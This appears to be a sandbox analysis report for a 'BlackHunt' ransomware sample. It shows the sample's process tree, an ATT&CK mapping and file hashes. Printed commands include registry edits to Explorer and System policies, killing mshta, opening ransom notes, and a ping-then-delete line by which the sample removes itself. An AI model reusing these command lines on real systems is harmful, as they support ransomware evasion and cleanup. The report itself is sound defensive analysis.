C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:9568
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:20532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:9736
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:20556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1800
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:20724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3704
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:20740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:12296 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:20816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 20816 -s 13924⤵
- Program crash
PID:20948
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\8409ce922ea1e1430cf6373edfbcfe7bf6f83eb09b09e01677df30a6a32d40f5.exe"2⤵PID:12312
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:20616
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:2016
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Adds Run key to start application
PID:1424
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6968
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:16100
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:21276
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:10532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 20816 -ip 208161⤵PID:20924
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51fa4114f5d0efa62c02448fe7e505759
SHA19edf3235ee0059f9c8a17fda2fcfe715f0432bbd
SHA25694162cc90855081403709bd5fb40388ab6fc957daff98958b06241fd28acb272
SHA5126cc536d60f8749858414d5977621d06f7b8eb8569962f7b5a290d850e46b2499b8e2f2d91e6eb7dc2cf3f33c4357ca3921139f0dc05a7f987c3c1683e05d276b
-
Filesize
12KB
MD5f1d1aaff2f21787165bce8ac974dfeb6
SHA150b94b39d189d67ddd93dc7140807d5608071b79
SHA256519ef23ac0fd4447825bb5fda0095fcceabbbc895c0fd9946677448fbc9b1d3e
SHA512a4cde32eae189366559beb5ad14cc4e7621fb9c69aaf9e5cd31d58cb616cc84e66daf30cdd7fe7f5bca66a8dc04b6c099c4e2ffc6bb2f13ba5d22ec00e5a8aaf
-
Filesize
684B
MD551ea5cc8af0317d822fa172be4042c20
SHA1fe03966ddd152fb460f24e23064e7b07d2cb6ad5
SHA2566fea25517a414465c0f59d84ccd1e5e4242f2ff2c79a3a5531d4ced74b2092c0
SHA512bf9bb4ef3c16e1b70c0a8367f41ae54fa5bbcd2f1a0d322c35b0047c5bdfc9437c3d3eebbab0d4f7737b301314e029d5206c670b5a58ac409d9cc1bf7cd53b9f